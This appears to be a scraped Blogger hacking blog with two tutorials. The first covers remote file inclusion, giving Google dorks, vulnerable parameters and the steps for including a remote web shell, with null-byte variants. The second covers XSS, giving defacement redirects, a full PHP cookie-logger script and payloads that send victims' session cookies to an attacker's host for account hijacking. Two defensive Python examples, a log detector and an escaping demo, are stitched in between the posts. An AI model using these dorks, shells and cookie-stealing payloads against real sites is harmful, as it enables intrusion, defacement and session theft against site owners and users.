rfi to this dork: /classes/adodbt/sql.php?classes_dir=<br />
<br />
dork: "Powered By ScozNews"<br />
rfi to this dork: /sources/functions.php?CONFIG[main_path]=<br />
rfi to this dork: /sources/template.php?CONFIG[main_path]=<br />
<br />
inurl:"kb_constants.php?module_root_path="<br />
<br />
dork: allinurl:"mcf.php"<br />
rfi to this dork: /mcf.php?content=<br />
<br />
dork: inurl:"main.php?sayfa="<br />
rfi to this dork: /main.php?sayfa=<br />
<br />
dork: "MobilePublisherPHP"<br />
rfi to this dork: /header.php?abspath=<br />
<br />
dork: "powered by phpCOIN 1.2.3"<br />
rfi to this dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=<br />
<br />
allinurl:login.php?dir=<br />
<br />
inurl:"index.php?go="<br />
<br />
inurl:"index1.php?="<br />
<br />
inurl:"lib/gore.php?libpath="<br />
<br />
inurl:"index2.php?p="</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Exploit scanners: <a href="http://www.youtube.com/v/f6SOzynrWx4" target="_blank">http://www.youtube.com/v/f6SOzynrWx4</a><br />
<br />
<span style="text-decoration: underline;">We've got our target, how do we exploit this vulnerability?</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.<br />
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?p=interview.php</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
As you can see above, index.php takes a file name as a parameter. In this case it is "interview.php". Most of the time there will be a file name at the end of the URL, just like this one: since the script includes whatever file is named there, there is something for us to replace.<br />
<br />
<span style="text-decoration: underline;">Tweaking and exploiting.</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
So now we want to tweak this to our advantage. This is rather simple.<br />
<br />
<span style="text-decoration: underline;">What you will need.</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).<br />
You will need to upload it to any web host.<br />
So once you have uploaded your shell to your website, it should look like this.<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://yoursite.com/shell.txt</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
<span style="text-decoration: underline;">Including our shell in the target's website.</span><br />
Okay, once we are at the vulnerable page (<a href="http://victimsite.com/index.php?p=include.php" target="_blank">http://victimsite.com/index.php?p=include.php</a>) we want to replace "include.php" and include our own file.<br />
Our new link should look like this.<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> The question mark (?) is important: anything the script appends to the parameter (a fixed suffix such as ".php") then lands in the remote URL's query string instead of its file name. If the site was vulnerable you should now see your shell embedded in the webpage. You can then do as you wish with it.<br />
<br />
Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?%00".</span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
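The two request shapes just described (a query parameter whose value is a remote URL, and the same with a trailing null byte) are what a defender looks for in the web server's access log. The following is an added example for this page, not code from the original post: it parses Combined Log Format lines and flags any parameter value that is itself a URL or contains a NUL character. The log lines are constructed (RFC 5737 documentation addresses) and the parameter names are assumptions.

```python
"""Detection logic for the remote-file-inclusion pattern described above.

Added example for this page, not code from the original post. It scans
Combined Log Format access-log lines for a query-string parameter whose
value is itself a URL (the "?p=http://.../shell.txt?" shape) or carries a
null byte (the "%00" variant). The log lines below are constructed, with
RFC 5737 documentation addresses; the parameter names are assumptions.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format: host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# A value that begins with a URL scheme (http://, ftp://, but also PHP stream
# wrappers such as php:// or data://) or is protocol-relative (//host/...).
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def rfi_findings(line):
    """Return [(param, value, reason), ...] for one access-log line.

    An empty list means the line did not parse or carried no indicator.
    """
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # keep_blank_values keeps "?p=" style probes visible with an empty value
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes, so %00 arrives as a real NUL character
        if "\x00" in value:
            findings.append((name, value, "null byte in value"))
        elif REMOTE_RE.match(value):
            findings.append((name, value, "remote URL in value"))
    return findings


def scan(lines):
    """Return (client host, request target, findings) for each flagged line."""
    hits = []
    for line in lines:
        findings = rfi_findings(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("host"), m.group("target"), findings))
    return hits


# Constructed sample: one normal request, the two probes the post describes,
# and an unrelated request from another client.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Dec/2011:09:30:01 +0530] "GET /index.php?p=interview.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Dec/2011:09:30:07 +0530] "GET /index.php?p=http://198.51.100.7/shell.txt? HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Dec/2011:09:30:12 +0530] "GET /index.php?p=http://198.51.100.7/shell.txt?%00 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.20 - - [05/Dec/2011:09:31:00 +0530] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "curl/7.21"
"""

if __name__ == "__main__":
    for host, target, findings in scan(SAMPLE_LOG.splitlines()):
        for name, value, reason in findings:
            print(f"{host} {target}: {name}={value!r} ({reason})")
```

A parameter that legitimately carries a URL (a redirect target, for instance) will match the second rule, so in practice the check is scoped to the parameter names the application uses for includes; the 200 status on the flagged lines, rather than an error, is what separates a probe that may have worked from one that was rejected.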
<br />
I hope this helps. Happy hacking.</span><span style="color: #666666;"> </span></b></span></div>Unknownnoreply@blogger.com11tag:blogger.com,1999:blog-3299468824600484367.post-70107017812216867342011-08-27T21:38:00.000-07:002011-08-27T21:38:17.931-07:00XSS - Cross Site Scripting.<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.<br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">What is XSS, what can I accomplish with it?</span></span></b> <b><br />
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.<br />
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.<br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">What causes the vulnerability?</span></span></b> <b><br />
Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly: what we type in is not filtered or encoded but written straight into the page's source code, so the browser renders whatever we submitted. They allowed characters such as ">, ", /", etc.<br />
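What the missing filtering looks like next to its fix, as an added example for this page (not code from the original post): a constructed search page that echoes the term into an attribute value and into element text, rendered once verbatim and once with HTML encoding. Python's html.escape stands in here for PHP's htmlspecialchars with ENT_QUOTES; a real HTML parser counts how many script elements each rendering actually contains.

```python
"""Reflected XSS: the unfiltered echo described above, beside the encoded one.

Added example, not code from the original post. Python's html.escape stands
in for PHP's htmlspecialchars($s, ENT_QUOTES); the page template and the
probe strings are constructed for the example.
"""
import html
from html.parser import HTMLParser

# Constructed template: the search term lands in an attribute value and in
# element text, which are two different HTML contexts.
PAGE = '<input name="q" value="{q}"><p>Results for {q}</p>'

# Two probes: a bare script element, and one that first closes the
# surrounding attribute with "> before the script element.
PROBES = [
    "<script>alert('XSS');</script>",
    "\"><script>alert('XSS');</script>",
]


def render_unsafe(q):
    """Echo the term verbatim, as the vulnerable search page does."""
    return PAGE.format(q=q)


def render_safe(q):
    """Encode <, >, & and (quote=True) both quote characters before echoing.

    Encoding the quotes is what keeps "> from closing the value attribute.
    """
    return PAGE.format(q=html.escape(q, quote=True))


class _ScriptFinder(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def script_elements(page):
    """Number of <script> elements a parser finds in the rendered page."""
    finder = _ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.count


if __name__ == "__main__":
    for probe in PROBES:
        print(repr(probe),
              "unsafe:", script_elements(render_unsafe(probe)),
              "safe:", script_elements(render_safe(probe)))
```

The parser count shows why context matters: the bare probe reflected inside the value attribute is inert there (only the copy in element text becomes a script element), while the probe that opens with "> produces two. With quotes encoded, neither produces any. The cookie logger later in the post reads document.cookie, which the HttpOnly flag on a session cookie denies to script, so that flag is the matching server-side control for the cookie theft the post describes.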
<br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">What types of XSS are there?</span></span></b> <b><br />
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.<br />
<br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">What will you be teaching today?</span></span></b> <b><br />
The basics of XSS and cookie logging.<br />
<br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">How to test for XSS vulnerabilities.</span></span></b> <b><br />
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.<br />
</b> </span> </div><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><script>alert('XSS');</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> We now see a pop up message on our screen saying "XSS". This is what it should look like: </span><a href="http://img845.imageshack.us/img845/7924/xss1.png" style="color: #666666;" target="_blank">http://img845.imageshack.us/img845/7924/xss1.png</a><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.</span></b> <b><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>"><script>alert('XSS');</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> Okay, we have found out that it is vulnerable. 
We can now move on.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">How can I deface a webpage with XSS?</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> I will be showing you methods for persistent, and non-persistent XSS.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">Persistent XSS.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply inject some more Javascript like we did before:</span><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><script>window.location="http://yourdefacepage.com/index.html";</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> Remember, you can always alter the code if it doesn't work.</span><br style="color: #666666;" /><span style="color: #666666;"> You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">Non-persistent XSS.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> Okay. 
Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">How to make a cookie logger.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> Make two files:</span><br style="color: #666666;" /><span style="color: #666666;"> Cookiemonster.php</span><br style="color: #666666;" /><span style="color: #666666;"> Cookies.txt</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> Cookiemonster.php:</span></b> <b><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><?php<br />
/*<br />
* Created on 16. april. 2007<br />
* Created by Audun Larsen (audun@munio.no)<br />
*<br />
* Copyright 2006 Munio IT, Audun Larsen<br />
* <br />
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,<br />
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS<br />
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE<br />
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES<br />
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;<br />
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,<br />
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,<br />
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. <br />
*/<br />
<br />
if(strlen($_SERVER['QUERY_STRING']) > 0) {<br />
$fp=fopen('./cookies.txt', 'a');<br />
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");<br />
fclose($fp);<br />
} else {<br />
?><br />
<br />
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';<br />
<br />
// ==<br />
// URLEncode and URLDecode functions<br />
//<br />
// Copyright Albion Research Ltd. 2002<br />
// http://www.albionresearch.com/<br />
//<br />
// You may copy these functions providing that <br />
// (a) you leave this copyright notice intact, and <br />
// (b) if you use these functions on a publicly accessible<br />
// web site you include a credit somewhere on the web site <br />
// with a link back to http://www.albionresearch.com/<br />
//<br />
// If you find or fix any bugs, please let us know at albionresearch.com<br />
//<br />
// SpecialThanks to Neelesh Thakur for being the first to<br />
// report a bug in URLDecode() - now fixed 2003-02-19.<br />
// And thanks to everyone else who has provided comments and suggestions.<br />
// ==<br />
function URLEncode(str)<br />
{<br />
// The Javascript escape and unescape functions do not correspond<br />
// with what browsers actually do...<br />
var SAFECHARS = "0123456789" + // Numeric<br />
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic<br />
"abcdefghijklmnopqrstuvwxyz" +<br />
"-_.!~*'()"; // RFC2396 Mark characters<br />
var HEX = "0123456789ABCDEF";<br />
<br />
var plaintext = str;<br />
var encoded = "";<br />
for (var i = 0; i < plaintext.length; i++ ) {<br />
var ch = plaintext.charAt(i);<br />
if (ch == " ") {<br />
encoded += "+"; // x-www-urlencoded, rather than %20<br />
} else if (SAFECHARS.indexOf(ch) != -1) {<br />
encoded += ch;<br />
} else {<br />
var charCode = ch.charCodeAt(0);<br />
if (charCode > 255) {<br />
alert( "Unicode Character '" <br />
+ ch <br />
+ "' cannot be encoded using standard URL encoding.\n" +<br />
"(URL encoding only supports 8-bit characters.)\n" +<br />
"A space (+) will be substituted." );<br />
encoded += "+";<br />
} else {<br />
encoded += "%";<br />
encoded += HEX.charAt((charCode >> 4) & 0xF);<br />
encoded += HEX.charAt(charCode & 0xF);<br />
}<br />
}<br />
} // for<br />
<br />
return encoded;<br />
};<br />
<br />
cookie = URLEncode(document.cookie);<br />
html = '<img src="'+ownUrl+'?'+cookie+'">';<br />
document.write(html);<br />
<br />
<?php<br />
}<br />
?></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> Then just leave cookies.txt blank. But make sure you made the file.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">How do I send my cookie logger to my slave?</span></span></b> <b><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><a href="javascript:document.location='http://www.mysite.com/cookiemonster.php?cookie='+document.cookie;">Click here!</a></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /></b> </span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">What does a cookie look like?</span></span><br style="color: #666666;" /><span style="color: #666666;"> Once you have received their cookie it should end with "PHPSESSID=52ce8e4a74936673js24500be1919004"</span><br style="color: #666666;" /><span style="color: #666666;"> The cookie is the string after "PHPSESSID="</span><br style="color: #666666;" 
/><span style="color: #666666;"> There are different forms of cookies. If you have your cookie logger set up correctly it won't matter, just copy and paste it all into your cookie editor.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">What can I do with someone else's cookie?</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> Once you have someone else's cookie you can use a cookie editor (search for one on Google), go to the victim's website, change your cookie to theirs and you should be logged in as the user they are. Example: if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and do as you wish.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">Using other programming languages for XSS.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> It's simple, to test if it's vulnerable try this.</span><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><html><font color = "red">XSS</font></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> If the text says XSS in red, then it's vulnerable to HTML injection as well. 
Just inject other languages in, and you will be able to do much more.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> I hope this helps. Happy hacking.</span></b> </span></div>Unknownnoreply@blogger.com1